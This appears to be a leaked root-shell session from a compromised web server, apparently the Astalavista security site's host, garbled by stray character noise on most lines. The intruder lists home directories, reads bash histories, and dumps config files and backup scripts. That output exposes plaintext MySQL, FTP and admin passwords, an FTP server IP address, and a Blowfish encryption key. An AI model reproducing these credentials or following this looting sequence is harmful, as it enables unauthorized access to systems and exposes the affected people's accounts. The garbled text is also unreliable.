#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #2 q0 N: Z8 s# J" B$ f1 G; b2 C
# |__| [__ | |__| | |__| | | | [__ | |__| #
- t# w7 F# Q K. ~# | | ___] | | | |___ | | \/ | ___] | | | #
% s4 {4 R/ M# Y/ f. z% p0 k# #+ n% c$ [8 h" u$ d6 n. d: R, \
#####################################################
( _: i% g$ ]- s2 Q; s6 R# #0 o' z4 k; _0 u1 k9 w, D/ g8 A
# Admin Contact - 链接标记support@secureservertech.com #
F+ h' k8 u+ k5 k2 H7 k# #1 q7 K/ e/ s, f3 D% {2 F
# Available ShortCuts #
$ c/ N( ^4 l6 ~8 A# #& d0 W! |6 s. v0 {% H
# nst - list active connections #
0 t9 d. l, T! p) w9 q# ddos - shows how many times each ip is connected #
. ?/ o1 c+ Q( }/ a8 Z. N# ltr - restart the webserver #" n4 T; X/ ~4 `1 r3 c( w4 D
# phpc - edit the php config file #4 L! @8 E& g" j9 T
# htc - edit the webserver configuration file #
# V) d+ c1 J' z- e# up - uptime #
. F D( Y. {, ]" F" B8 g3 ?# etd - edit the motd of the day file #3 l- r- t2 q9 t6 C
# htr - start and restart apache if needed #
+ z, B n ?7 {5 p# syng - shows active SYN_RECV connections # r2 r" P! m. B$ z% r+ U3 |& V
# synd - syn flood blocker - “synd -h” for usage #
$ l' ~1 G' |5 b1 Y" v) s#####################################################/ l! E0 \1 {, c8 s4 u3 V0 W: `* T
# NOTES: #
% y0 Q$ c Z. p! o4 w# Last Upgrade - 12-08-2008 by JF #
0 Z8 u7 f' _' s% z7 |& |# My.cnf/Mysql Optimization - 1-28-09 #
6 s E9 H1 U o$ s( A7 d# #. k% _; B# h9 _, d
# #
! P3 ^1 z O( ]9 K1 D# #
1 k @9 b; B3 n, ?#####################################################
2 b. N& X% J$ i) X7 k9 Z' Q* L# w* I- j
sh-3.2# lastlog | grep -v Never
2 Y1 J1 \* {# B: B0 N: `Username Port From Latest
! t% c2 Z4 v6 V# uroot pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
4 }: Y6 o, n. fadmin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 20082 U! L2 E0 [1 o S# s/ P
com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009' V0 G% S A9 x6 j, E" o+ U
astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 20092 j+ k$ @, _+ I7 e" R* Z& D0 X
' Q' p" O5 W. Psh-3.2# ls -la
( L7 J4 _% b9 ctotal 453376
% K; Z4 |$ b& Z0 j" Ydrwxr-x— 15 root root 4096 Jun 4 08:40 .
/ b0 c+ ?, F5 G. Y5 udrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
4 _9 L, q$ D4 r7 K; @ U-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip. u$ z3 c S2 `4 N
-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg$ N% F- u, _! j' e
-rw——- 1 root root 16836 Jun 4 07:21 .bash_history! b4 A7 J2 z! O/ q- y8 M6 y
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
/ D$ m! ~3 Y9 q9 s5 P% _3 a1 B-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile. F! Z& L% q+ v
-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc
$ L* i) I; g6 e4 D/ O" V-rwx—— 1 root root 1899 Oct 28 2007 bk.sh
8 e9 s4 @; S& L" M4 ^ s0 [1 T9 A-rw-r–r– 1 root root 1327 Nov 29 2007 cert
* }4 Y0 U+ ]0 M u& O( s! F& ]7 O5 K-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
! J. X, b5 ^3 R( M6 v8 udrwxr-xr-x 4 root root 4096 May 20 2008 .cpan$ X$ c: u# M/ M9 l" K
-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc
Q, q, s6 a2 T: B-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
( f5 f5 ]/ W: \8 {' Bdrwx—— 2 root root 4096 Oct 28 2007 .elinks
% ^. T- R$ _6 n5 h% qdrwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
& Q3 M0 m; D% K3 c' [-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2, `: g7 O' u4 x6 \5 |
-rw——- 1 root root 0 Apr 16 13:19 .history- _7 @9 F: o d
-rw-r–r– 1 root root 16095 Sep 11 2007 install.log6 N+ o5 \5 s* o: |4 u" [- b
-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog9 H7 R. v4 e7 J1 D+ E" | ]" Z5 |
-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh1 S3 r: z1 x5 D2 S- M- H
-rw——- 1 root root 35 Jun 2 14:23 .lesshst
3 r, e9 f! |7 q* m% B' @' j0 Kdrwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp% b' \& D p( i- j5 l6 s( P( E
drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
3 [6 E1 I: M; R3 K, h-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz" j' C4 B7 T* Q% N, T1 V
-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2) s- Y" g5 p l1 y
-rwx—— 1 root root 760 Sep 18 2008 lp. \7 ~( n4 o9 @3 }
drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
6 \& J* H3 {7 f1 p6 ~-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
2 W& F+ E/ \" }9 E* J" z-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
$ B$ A b& b- M6 g4 \* W+ @! Gdrwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.98 x$ X9 x8 V" @" K# O+ n
-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz9 h/ O" ~2 [% \3 h% I( K3 h
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3- h! @# _* b5 |- i, c2 F
-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
' P+ S. j$ D, J! j a. o" }$ H0 v-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh
* ~) U ^! T6 A-rw——- 1 root root 41 Oct 19 2007 .my.cnf5 a1 p) s9 B4 a+ n3 b
-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history0 E6 {" ^+ L+ p# Y/ K7 r
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport5 i7 B# E9 f ^; [" }" U% e
-rw——- 1 root root 41 May 20 2008 .mytop
9 v u/ D4 `! J9 D) k; r' gdrwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.61 s% A1 i* S+ X) W0 |
-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz# G+ j8 E6 r D0 U9 l' ]
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp2 Z, R' g% I, {/ w% Q* e3 l
-rw——- 1 root root 1462 Sep 21 2007 opt.php
( l/ O8 ^( |9 R: \. X& u& j5 o-rw-r–r– 1 root root 3371 Sep 22 2007 p
, A0 K5 Q, M, o# h2 N8 ?" ]- s-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2# U8 b2 q% j* Y' W, ]6 b9 Q5 {0 ]0 F
-rw——- 1 root root 1024 Feb 3 21:32 .rnd
- [4 B! {0 Z$ n' c4 B$ {. ?& E2 f-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
% A1 D8 H( G" @- v! ^3 X4 f-rw-r–r– 1 root root 887 Nov 28 2007 server.key
' s3 a- M3 x6 T9 a" V( `drwx—— 2 root root 4096 Oct 10 2008 .ssh1 ]1 R- k6 o- C$ q% r! v8 p4 O
-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat8 M! D4 e' E P8 D! J( r7 ~
-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc
8 X/ i9 x! J( T( b: f6 o8 r-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip3 T4 A6 k( x. G: L
-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1
- M0 j/ V5 t& P0 \drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp1 g( m+ \9 U# @- p6 W" u, V$ o
-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh
0 V: k1 D" @( v6 Y# j, s$ Ddrwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0
- Z7 m: B) X/ L2 N& J-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2% d7 B" }1 {8 b, c
-rw——- 1 root root 12997 May 16 2008 .viminfo
# x7 K- @- i$ {+ T5 S( M. {5 ]6 w# Q M7 D9 v# l8 J! I% q
sh-3.2# cat .bash_history5 A: ^( P4 N+ S) O' f
[snip]$ T9 \4 Z; n9 ]. [+ o6 B) F- e
wget cp4sst.com/sstlinux.tar.gz
0 i# f3 o% D4 l) p9 ], [2 Xtar zxvf sstlinux.tar.gz
9 [( b( K" O t z- A- Ecd linux-2.6.27.10
& y1 L4 m+ u7 J! B: g* hsh install.sh. M3 B$ o: g4 J4 [) z8 p
make bzImage ; make modules ; make modules_install ; make install
' ]3 F; L: }2 N7 omake clean' g5 Z2 E( N* Q0 S' s, r% a
service mysqld restart
+ O* F: [1 }. E4 Z[snip]
% d) Y( F7 E) |+ F5 kcd /usr/sbin/4 m/ g Z/ J0 H: Z2 y
chmod 4777 traceroute
/ r- [+ R- F1 M% S( o4 z8 u8 T' [ Xchmod 4777 ping. f9 I& k u" X8 A0 q
traceroute -I 链接标记[url]www.astalavista.ch[/url]6 M! `/ t& _% t9 x4 t8 ~% y
[snip]9 t4 C6 h/ S) j8 s) R: w% x
vi /etc/csf/csf.conf, |7 K3 P5 r, ~1 U3 `: e4 ` i
traceroute google.ch- E* `& ]3 H% V' I) A2 P
service csf restart
* Q0 l$ e' H, T$ j1 X& e0 W& Stracert google.ch
* V4 E: D+ X' \7 i, i: c5 Zservice csf restart6 m+ P" [8 R6 [! w( {7 [. B& m
traceroute 链接标记[url]www.google.ch[/url]
v) F1 }8 P3 N! ?( {! @tracert 链接标记[url]www.google.ch[/url]
\5 n4 ~6 d- m0 s4 \! {traceroute 链接标记[url]www.google.ch[/url]
1 n. t. x9 F1 N7 D. Plocate traceroute6 ]! n7 ^0 u2 L7 R; Q2 E
chown 4755 /bin/traceroute
9 e( {0 Y$ L' L- ]. u! \$ k, G6 x% Rchown 4777 /bin/traceroute$ v" g5 ~7 Z% w6 B% m2 a" W3 _
locate ping
m1 `' L1 T- n4 nchown 4755 /bin/ping
. u) z2 h7 J/ m" b/ C+ Bchown 4777 /bin/ping
( ~1 ~0 e3 V( j3 _cd /bin/7 M/ G! F2 L2 f7 W& Q0 ?, d7 `8 P
ls -ali | grep ping
8 Q8 |" [" r& ^! g- G) W6 ~chown root ping
0 B5 y8 r* C! J U3 {% D+ Schmod 4755 ping% k* r5 t- j% s
ls -ali | grep traceroute) n" A" Y& y; W/ U: i8 [
chown root traceroute# u: H4 Y- e1 C6 y' M! T# X
chmod 4755 traceroute
- H. `4 a9 }' }# b s2 jls -ali | grep traceroute
' c& j- b, C6 ntraceroute -I 链接标记[url]www.google.ch[/url]8 m/ ?' S$ {4 S
traceroute 链接标记[url]www.google.ch[/url], k5 e! d, i$ m9 @
whois pmsantos.ch
6 n& v/ v$ n4 k- O- ]2 I[snip]
X. _: g; ~' ^: S# [9 Xmysql -h com_contrexx2_live < /root/defaultp_ports.sql+ I# J# g3 A8 ?0 X' q/ x, b7 |
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
' p$ ]1 a/ h3 ~$ ?mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql8 L% `$ w! j l
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql0 P5 l. K( { ~" n, J3 u( X
top9 u* Z8 O# U2 }
ping ssth.ch
) N/ }* ?0 ~9 Y9 f; zping asdlkfaljgasd???ljg???lasj.ch
# Z1 m/ Y7 U# l( h7 Pping asdlkfaljgasdlasj.ch, G6 k7 \& K& `9 j
ping 链接标记[url]www.ssth.ch[/url]
) z" b& P U: j# wping ssth.ch+ `% ^* A* r; C% F, P8 G$ L0 } r
nslookup 链接标记[url]www.google.ch[/url]
H% r5 N1 k. k5 Z- bnslookup 链接标记[url]www.ssth.ch[/url]! A; t! o! y9 ]: g" n0 O E, V
man nslookup) `* ~0 O+ Q! p5 `
ping 链接标记[url]www.google.ch[/url]
3 n2 N7 L" u0 Xnslookup 链接标记[url]www.google.ch[/url]
9 W" c9 B+ e2 J( t+ s* _; g0 Snslookup 链接标记[url]www.google.ch[/url]
; g# q1 ]" D( Z, `nslookup salfjasdlf.ch
: M1 B7 B, V. I[snip]
* ^+ R: V. b) u$ R9 z! B. ~& Uopenssl passwd -1 sadf5 }, v# }6 H! r+ \) V9 z
openssl passwd -1 5cZNHstdTy
6 ~, V2 C+ [2 Z! a' D- J% f1 ?mysql
: i" O0 b w3 @3 S0 ?" @mysql+ C1 a! e' G2 U6 a
locate proftp
6 `3 S+ g' ~9 c" D6 Qvi /etc/proftpd.passwd
3 _" o% o7 T8 v- H7 N) B nservice proftpd restart
! p# M0 W3 H. e% [ n" zlocate proftpd.conf
- j* I9 t c' `# |+ Dvi /etc/proftpd.conf* q/ F& ?$ `. y4 M9 f
vi /etc/proftpd.passwd" q7 Q, v0 D' y; }
service proftpd restart6 [, }$ Z: g' _( |9 P6 Y
[snip]1 `- u- D6 E/ d7 H. h
/bin/sh /home/com/backup_system/backup.sh. I/ N8 h) `- F2 F' o* O& z% _
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
$ J7 |- H8 c% C* dmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql) }) O. ~% N! x j- ]- T( W! j
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
/ g' Y6 |1 a; I) f$ e. Uls -ali& w7 B9 b) Q7 }; o4 q# u7 _
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql& Z0 p' O0 ?: V
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql1 k9 D+ ^: k! G+ A" B/ f
crontab -l
/ ?4 S: y+ M2 rcrontab -l
! r: F/ k6 M. F4 h& d+ M) k( Cphp -q /home/com/public_html/modifications/cronjobs/securitynews.php
1 c. i; v) }9 J- h/home/com/public_html/modifications/cronjobs/exploits.sh9 t( k! X: W" M0 X8 l: }
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]# \2 f8 Y4 B# d: U2 B3 z5 y
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz" s" D5 y7 w c2 ?8 y, O$ r: ]
cd lsws-4.0.3: ]6 S0 w u7 H) c
sh install.sh/ V2 G* `+ e8 M; C7 h8 c) Q; v+ l' o
uptime
' _) o; j# H8 ?1 [hdparm -tt /dev/sda0 k/ {! a/ x; l
iostat
6 Q% L" f3 m! Q5 m7 a% E5 \yum install iostat
1 q' E/ A \+ S& E% t s* h6 iiostat: I# V% i. v( H
whereis iostat0 g8 z8 R+ B( H- X+ Z# c3 n
yjm clean all0 [ i- c, \. f
yum clean all ; yum -y update
4 R* z3 ~0 i# i. _3 e, e9 p) aiostat5 o" \8 x8 k' y
yum install systat
0 I) d/ H3 h+ {rpm -qa | grep iostat# }4 b5 G" k, K1 P% D
rpm -qa | grep sysstat
" e& P) G* Y B" x" j2 Arpm -qa | grep systat
. `* \7 z ]9 g" a& cdmesg -c
& e5 s$ [* n% L7 O! Lsysctl -p
, e+ q% u5 R( U' suname -r! k; {( o( m( p: D
cd /usr/src
- U% J% e/ N& e7 Nwget nix101.com/kernels/sstlinux.tar.gz- s( Q+ f6 g$ |& V% T5 L1 f8 A
shutdown -r now3 A) I6 H" ~8 [) T. M0 O
nano -w /boot/grub/grub.conf( D2 b- M& K/ q& ~* {, T
' g- |, i% e9 f6 }6 G$ {1 i
sh-3.2# cat .my.cnf
5 X/ D( d1 V: h8 `% n% ][client]
8 p* h! p$ c& |4 j6 Puser=da_admin" |, u; M& d0 m1 B q
password=X9dctmRH4 w. b- ~% `& [. @" t1 z6 A
; ^ X/ y! s& O$ B7 q3 D. s7 w
sh-3.2# cat /home/com/backup_system/backup.sh
/ F! L- ^* M& `" H' u, {#!/bin/sh$ P1 h) R) t: E& Y i
#####################################################################; ?5 }" n9 y0 {7 M
# #
0 f: u2 r5 G/ g+ \$ J) x# incremental backup for astalavista.com #- a, f* ]1 A! x! O& u9 r3 D
# #
( g v5 |- H4 ~* r/ \# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #$ C3 G- c5 s. p" y
# #* f8 ^; O- l# [1 \ ~
#####################################################################$ y. x: H* h1 \# P r$ W |
[snip]5 O! _, u' _, I4 r$ m7 s2 j* J- D
PROG_DIR=”/home/com/backup_system”;
: q, Z3 V7 F* W6 L$ JBACKUP_DIR=”/home/com/backups”; @$ j/ m) Q5 \
DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
8 n7 F' M3 \! g. @; }1 u3 Z# ftp for synology backup server3 U r& W7 g: j" B) _
FTP_HOST=”212.254.194.163″; O$ ^: F1 A# E# F* ]( |
FTP_PORT=”21″;5 l: t7 o$ _+ W% W
FTP_USER=”astalavista.com”;) j) e4 e& t- w# ?
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;7 K4 z A8 @! C- l7 H; b
FTP_DIR=”/astalavista.com”;
% I( h1 N. n* z$ s$ q8 h4 d1 i# database
$ N- d# ~5 F! r2 k( ~ bDB_HOST=”localhost”;+ B% U, h# C" g- t1 b/ G& P
DB_USER=”contrexxuser2″;, A8 {1 c* x/ m' d4 x
DB_PASS=”0fEYNZgXz1pKe”;3 R- d* {: h, t, t
DB_DATABASE1=”com_contrexx2_live”;
: h/ ~( ]9 N& A8 t( O3 L/ ODB_DATABASE2=”com_contrexx2″;+ U& D% r2 q* E& {' C
[snip]/ O* x. I) p4 h0 P4 }1 C
ftp -in $FTP_HOST $FTP_PORT <<EOF
# O& W+ h9 W- z7 Y( y1 t( Pquote USER $FTP_USER& ]# b0 g: H3 R4 l: [& N
quote PASS $FTP_PASS6 B. {: ]+ t' U _ w0 ~8 H% W
cd $FTP_DIR
; |. S" P. @6 _- H2 M& jput $DB_FULLNAME-SQL_Dump.tar2 A6 r4 e2 W$ I& ]. R- E @
put $BACKUP_FULLNAME-Public_HTML.tar
; g. E, n( n/ W0 T0 Gclose
2 D% b' z6 e9 o* wbye& s' R0 l) g" u4 e3 L
EOF
- Y6 b. K! k! V1 b/ Y6 G `$ P# W8 E0 \; z: S) d) L/ i( H8 Q
sh-3.2# cd /home& L' d& H9 y; q" D3 {! P/ {7 E8 D1 ^
sh-3.2# ls -la
/ J. ?! b9 ^/ u+ Htotal 120
8 g* W( p- z0 r( Z: Y' ?1 G* o9 Cdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .2 ]) U* c8 J- W$ V, i0 }) Y
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
! L5 {* F5 a u& Y9 {' a1 Tdrwx–x–x 9 admin admin 4096 Nov 28 2007 admin* ?( K8 j& P" t0 E8 H( J
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
& ?$ F; z6 i( y L4 l& u' \-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
+ F, A1 C; C+ [7 h$ N& n+ Fdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
, p/ h4 X# D: s( \- wdrwxr-xr-x 2 root root 4096 Jul 29 2008 backup
: E1 @8 A2 P4 x9 d" J+ {drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.141610 C" f8 ?- M# o* H- A
drwx–x–x 10 com com 4096 Apr 28 12:40 com
$ t2 H3 s+ ]& X/ B1 D. [drwxr-xr-x 2 root root 4096 May 17 2007 ftp3 g6 _6 a) A1 f
drwx—— 3 jon jon 4096 Sep 21 2007 jon
, Q7 e1 p0 g1 u, z( T8 w/ ~2 qdrwx—— 2 root root 16384 Sep 11 2007 lost+found) d7 q& G" p( a0 Y' \
drwxr-xr-x 2 root root 4096 Sep 14 2007 my! l" f7 z6 A7 F4 W" t+ b
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata; N; v4 l7 U4 r# Y7 O
drwx—— 2 jon jon 4096 Sep 15 2007 test
0 Y: | U# r4 _* m1 ]/ `. Xdrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp7 @( D) [. {, Z5 ?1 `
) F" g F* H% m
sh-3.2# cd admin0 |! Q( r' C: ^6 \9 z
sh-3.2# ls -la
3 B$ v: I' U0 g8 Etotal 1735896
7 z6 P$ y! S0 Y+ {+ `0 \drwx–x–x 9 admin admin 4096 Nov 28 2007 .9 K0 z+ p* I# Y0 P E a8 |# E- }' ^
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..+ A0 @4 T( k. I- W- ~
drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups% B& p1 W8 D2 ~! b
drwx—— 2 admin admin 4096 Sep 28 2007 backups( N, y' ~2 ?" T) k/ y
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history {2 Q4 h q0 Q4 m5 J; `5 b2 p
-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
) u% e% q; ~0 r1 f1 `% C-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile/ B/ Y' E# ^& K9 }/ R- D# K5 i4 q
-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc
! Q2 x2 I! B, Adrwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
! e2 j8 r# f; zdrwx–x–x 6 admin admin 4096 Sep 21 2007 domains& u( u9 z a' I3 O
drwxrwx— 3 admin mail 4096 Sep 21 2007 imap
& |/ b3 e. d# i-rw-r–r– 1 root root 24 Sep 21 2007 info.php
+ \: ~5 @" L( t8 v9 I, bdrwx—— 2 admin admin 4096 Sep 21 2007 mail6 L0 L" z" U# |% b4 Z) s
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr0 T# i) z' ?' p1 ^2 k
-rw-r–r– 1 root root 887 Nov 28 2007 server.key& \/ t. R4 |- d1 ^: [
-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow
x5 c2 W& F. X- W2 J-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
$ d0 T, [5 `7 V gdrwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups
4 _' K" m3 b5 x C. O% s4 O) P& q" [6 l$ X& l0 K; [* }
sh-3.2# ..
; y \+ H2 H, y+ V2 h& osh-3.2# cd jon8 m+ D$ ^1 _; Z8 Y
sh-3.2# ls -la
4 c- a) ^8 T8 rtotal 36
1 r" b" z7 w$ r6 ?drwx—— 3 jon jon 4096 Sep 21 2007 .
3 F. \4 }5 F$ Z9 Gdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
' B. x& e, K3 h: c& G-rw——- 1 jon jon 53 Sep 21 2007 .bash_history2 D# ` I; j# g! W' i
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout" j# b q# ~* i& H
-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile
* ~) h# j! `# e, O7 @+ i& N0 S-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc0 S, P/ _' ]# t5 H2 V
-rw-r–r– 1 root root 24 Sep 21 2007 info.php( W0 e2 ~: \! }8 e7 J8 C
drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
5 Q1 H$ E2 O9 p" x6 T: J& h4 X( d, i9 a
sh-3.2# cd ..* X) \: m+ J0 x8 ^
sh-3.2# cd test6 I' _# D: F) F$ ]
sh-3.2# ls -la9 U( Q! c( ^# r5 \" b
total 48* z. E# a) @* F* W4 S7 E
drwx—— 2 jon jon 4096 Sep 15 2007 .. ?( Y. C) z+ m O2 G( \3 Z4 `
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..9 Z5 Y$ G3 |# l$ V% v& t
-rw——- 1 jon jon 79 Sep 21 2007 .bash_history1 n' I* c+ F' K E
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
6 _, P& Q1 j0 b0 n# \ \' V-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile S: a. g% G0 p) d! N9 y3 m0 b
-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc
; C; x! W. g1 P3 d* qsh-3.2# cat .bash_history
! d1 E) S2 S# S+ t/usr/bin/mysqladmin -u root password PoliuJhytg67
6 G* p( e: `. U% q* }$ X/ z; v7 Q5 Z2 f$ J' b/ c
sh-3.2# cd ..
. M$ D, |4 w' F# psh-3.2# cd astanet) r& U7 C4 z& I: n. |+ u
sh-3.2# ls -la9 h& I( S8 _. A! `: P
total 52% M2 T7 ?- r* H* v
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .6 G+ V3 k2 z) a+ G+ Q" A* ^
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..8 e, \2 \. \# A) O& g+ d5 w
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
( t( T$ l* K/ E1 v-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
6 A* ]7 h8 ]2 q7 f3 Z) F-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
! O# N* I6 e& F7 d6 ~9 t* |-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile) D# l. y0 r7 |' j6 X1 Z' G6 d c
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc) s5 X+ ]2 X3 j$ Y2 w ]! }
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains$ M# f+ T9 a! |0 H* |* z0 W
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
3 G. \& c# V" s# o" t0 tdrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
& p a) J8 R5 E0 P, X-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history& P' I; @; H- m' l' U
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html6 o( B+ N( G2 m" b5 `" ~
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
6 |$ A. g5 b7 K- B% M
7 v; \3 g' X2 T* Ash-3.2# cd auth/2 z! ~- R g- o/ {1 z7 ~7 \: n
sh-3.2# ls -la9 S/ n6 ? X, q) @( t
total 28- S4 C" `7 z' \8 C9 n3 v
drwxr-xr-x 2 root root 4096 Dec 23 16:00 .; M$ B% Q! d& P0 Y6 {
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..
- {1 e9 C. q5 ]0 x! Q-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php9 F" _1 C7 m! ]3 V; ?+ { x
-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php; n; {5 i! z- }. l* Y) g
-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd1 \ v4 s* l' y* M5 B |" h
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting
$ a9 L4 a! U8 \! t8 V+ q-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd
/ A/ ?! o- J1 _+ c, _+ `
8 c& d- W% C7 O" p U# nsh-3.2# cat hackercontest.config.inc.php
6 b" V* r" ]4 ~% v# J- t9 D<?PHP
: s) R) a- g+ V9 q5 k// Variabeln f?r Verbindung zur Datenbank //
( v1 o7 i* N$ s) l$conxHost = ‘localhost’; // MySQL hostname9 ^3 r; _, ]2 f1 ~
$conxUser = ‘hackercontest’; // MySQL user
6 [6 d3 y6 L3 |8 C1 e& r5 _$conxPassword = ‘K6m@7dUc’; // MySQL password
# y- f- P0 v" T$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish6 \8 Z( j) ]1 g' n; Y1 H
?>, I# ^" S/ K& O; p9 }6 J. E s
sh-3.2# cat hosting.config.inc.php
+ m! p3 S5 _4 Q7 u. D<?PHP
; S9 _% m# J# Z0 z// Variabeln f?r Verbindung zur Datenbank //
/ q% Z* E0 o7 k3 l# E6 J; _$conxHost = ‘localhost’; // MySQL hostname; F2 R% y" e3 Z- l6 q
$conxUser = ‘hostinguser’; // MySQL user
) E6 g) X' C* X$conxPassword = ‘cXvB3981′; // MySQL password* e& `0 h0 K# W! X- w: Q- l
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
. ]% A+ g+ k# ?1 N?>
) N3 Q" k' A3 b; O t8 Q3 `
- l( S9 X$ F$ ~sh-3.2# cd ..
' v2 M9 Q, Q8 ]- I* g) |sh-3.2# cd com
, h% _/ @4 X- H! i( F: ]0 E$ [sh-3.2# ls -la7 U) g7 e5 j' Q/ \8 k
total 141208, Z- y; \5 x6 f
drwx–x–x 10 com com 4096 Apr 28 12:40 .) ]& ~6 t8 I: N! g# ?/ e2 J# |
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
